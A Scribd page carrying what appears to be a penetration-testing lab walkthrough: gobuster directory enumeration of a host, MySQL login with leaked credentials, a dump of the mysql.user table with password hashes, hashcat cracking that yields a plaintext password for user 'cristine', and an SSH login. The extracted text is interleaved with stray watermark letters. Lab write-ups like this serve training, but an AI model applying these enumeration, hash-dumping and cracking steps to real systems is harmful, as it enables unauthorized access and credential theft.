Scribd Logo
Upload

Welcome to Scribd!

  • 8 views

    110_..21..22..80..3306..8080

    Uploaded by

    yeyintthu.mst

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content

    You might also like

    110_..21..22..80..3306..8080

    Uploaded by

    yeyintthu.mst
    8 views3 pages

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as pdf or txt
    8 views3 pages

    110_..21..22..80..3306..8080

    Uploaded by

    yeyintthu.mst

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as pdf or txt
    of 3

    r

    i to
    .110

    gobuster identifies a /scipt folder on the server:

    Ed
    └─$ gobuster dir -u http://192.168.xx.110/ -w /usr/share/wordlists/dirb/common.txt
    ===============================================================
    Gobuster v3.1.0
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
    ===============================================================
    [+] Url: http://192.168.xx.110/

    DF
    [+] Method: GET
    [+] Threads: 10
    [+] Wordlist: /usr/share/wordlists/dirb/common.txt
    [+] Negative Status codes: 404
    [+] User Agent: gobuster/3.1.0
    [+] Timeout: 10s

    rP
    ===============================================================
    2022/09/10 10:06:37 Starting gobuster in directory enumeration mode
    ===============================================================
    /.htaccess (Status: 403) [Size: 279]
    /.hta (Status: 403) [Size: 279]
    te
    /.htpasswd (Status: 403) [Size: 279]
    /blog (Status: 301) [Size: 315] [--> http://192.168.xx.110/blog/]
    /images (Status: 301) [Size: 317] [--> http://192.168.xx.110/images/]
    as
    /index.html (Status: 200) [Size: 68778]
    /scripts (Status: 301) [Size: 318] [--> http://192.168.xx.110/scripts/]
    /server-status (Status: 403) [Size: 279]
    M

    browsing here, we identify a /script/xx folder:

    in this folder, we find the following file named wiki_setup.sh:


    found file:
    in
    ed
    at

    found in 192.168.xx.110/scripts
    mysql -u chanel -h 192.168.xx.110 -p
    re
    r
    i to
    MySQL [mysql]> select * from user;
    +-----------+---------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+-------
    --------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+------------
    -----------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------

    Ed
    ------+--------------------+------------------+------------+--------------+------------------------+----------+------------+---------
    ----+--------------+---------------+-------------+-----------------+----------------------+-----------------------+-------------------
    ------------------------+------------------+-----------------------+-------------------+----------------+
    | Host | User | Select_priv | Insert_priv | Update_priv | Delete_priv | Create_priv | Drop_priv |
    Reload_priv | Shutdown_priv | Process_priv | File_priv | Grant_priv | References_priv | Index_priv |
    Alter_priv | Show_db_priv | Super_priv | Create_tmp_table_priv | Lock_tables_priv | Execute_priv |

    DF
    Repl_slave_priv | Repl_client_priv | Create_view_priv | Show_view_priv | Create_routine_priv |
    Alter_routine_priv | Create_user_priv | Event_priv | Trigger_priv | Create_tablespace_priv | ssl_type |
    ssl_cipher | x509_issuer | x509_subject | max_questions | max_updates | max_connections |
    max_user_connections | plugin | authentication_string | password_expired | password_last_changed |
    password_lifetime | account_locked |

    rP
    +-----------+---------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+-------
    --------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+------------
    -----------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------
    ------+--------------------+------------------+------------+--------------+------------------------+----------+------------+---------
    ----+--------------+---------------+-------------+-----------------+----------------------+-----------------------+-------------------
    te
    ------------------------+------------------+-----------------------+-------------------+----------------+
    | localhost | root | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y
    | Y | Y | Y | Y | | | | | 0 | 0 | 0 | 0 | mysql_native_password |
    *0880FD3A9C8D2BB55A2C5C0BE9E0578EB55022B2 | N | 2022-06-22 09:47:01 | NULL | N |
    as

    | localhost | mysql.session | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | Y | N | N | N | N
    | N | N | N | N | N | N | N | N | N | | | | | 0 | 0 | 0 | 0 | mysql_native_password |
    *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE | N | 2022-06-22 09:46:58 | NULL | Y |
    | localhost | mysql.sys | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N
    M

    | N | N | N | N | N | N | N | N | | | | | 0 | 0 | 0 | 0 | mysql_native_password |
    *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE | N | 2022-06-22 09:46:58 | NULL | Y |
    | localhost | chanel | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N
    | N | N | N | N | N | N | N | | | | | 0 | 0 | 0 | 0 | mysql_native_password |
    in

    *407F8D35DAF8B6F7BC30BB665564CC36E8EA6FB3 | N | 2022-06-22 09:47:17 | NULL | N |


    | % | chanel | Y | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N
    | N | N | N | N | N | | | | | 0 | 0 | 0 | 0 | mysql_native_password |
    *407F8D35DAF8B6F7BC30BB665564CC36E8EA6FB3 | N | 2022-06-22 09:47:17 | NULL | N |
    ed

    | localhost | cristine | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N
    | N | N | N | N | N | N | N | | | | | 0 | 0 | 0 | 0 | mysql_native_password |
    *B12F09D11BB3852F8FA53FC7F017893DF01E3B82 | N | 2022-06-22 09:47:17 | NULL | N |
    | localhost | bob | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N |
    N | N | N | N | N | N | N | | | | | 0 | 0 | 0 | 0 | mysql_native_password |
    at

    *32520D64EA7094863697EC1BD3BE5FDC1496A1FF | N | 2022-06-22 09:47:17 | NULL | N |


    | localhost | shaun | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N
    | N | N | N | N | N | N | N | | | | | 0 | 0 | 0 | 0 | mysql_native_password |
    re
    r
    i to
    *DC4EA813DD21ACDBC05CB657D64E410062FF561A | N | 2022-06-22 09:47:17 | NULL | N |
    +-----------+---------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+-------
    --------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+------------
    -----------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------

    Ed
    ------+--------------------+------------------+------------+--------------+------------------------+----------+------------+---------
    ----+--------------+---------------+-------------+-----------------+----------------------+-----------------------+-------------------
    ------------------------+------------------+-----------------------+-------------------+----------------+
    8 rows in set (0.091 sec)

    DF
    MySQL [mysql]>
    MySQL [mysql]> select user,authenticationstring from user;
    ERROR 1054 (42S22): Unknown column 'authenticationstring' in 'field list'
    MySQL [mysql]> select user,authentication_string from user;

    rP
    +---------------+-------------------------------------------+
    | user | authentication_string |
    +---------------+-------------------------------------------+
    | root | *0880FD3A9C8D2BB55A2C5C0BE9E0578EB55022B2 |
    | mysql.session | *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE |
    te
    | mysql.sys | *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE |
    | chanel | *407F8D35DAF8B6F7BC30BB665564CC36E8EA6FB3 |
    | chanel | *407F8D35DAF8B6F7BC30BB665564CC36E8EA6FB3 |
    | cristine | *B12F09D11BB3852F8FA53FC7F017893DF01E3B82 |
    as

    | bob | *32520D64EA7094863697EC1BD3BE5FDC1496A1FF |
    | shaun | *DC4EA813DD21ACDBC05CB657D64E410062FF561A |
    +---------------+-------------------------------------------+
    8 rows in set (0.090 sec)
    M

    Machine users:
    root
    chanel
    in

    cristine
    bob
    shaun
    ed

    we can crack one of the passwords with: hashcat -m 300 -o cracked.txt -a 0 hashes
    /usr/share/wordlists/rockyou.txt

    └─$ cat cracked.txt


    b12f09d11bb3852f8fa53fc7f017893df01e3b82:2ql4sql
    at

    this is the hash for cristine, so we can now connect with ssh cristine@192.168.80.110
    re

    You might also like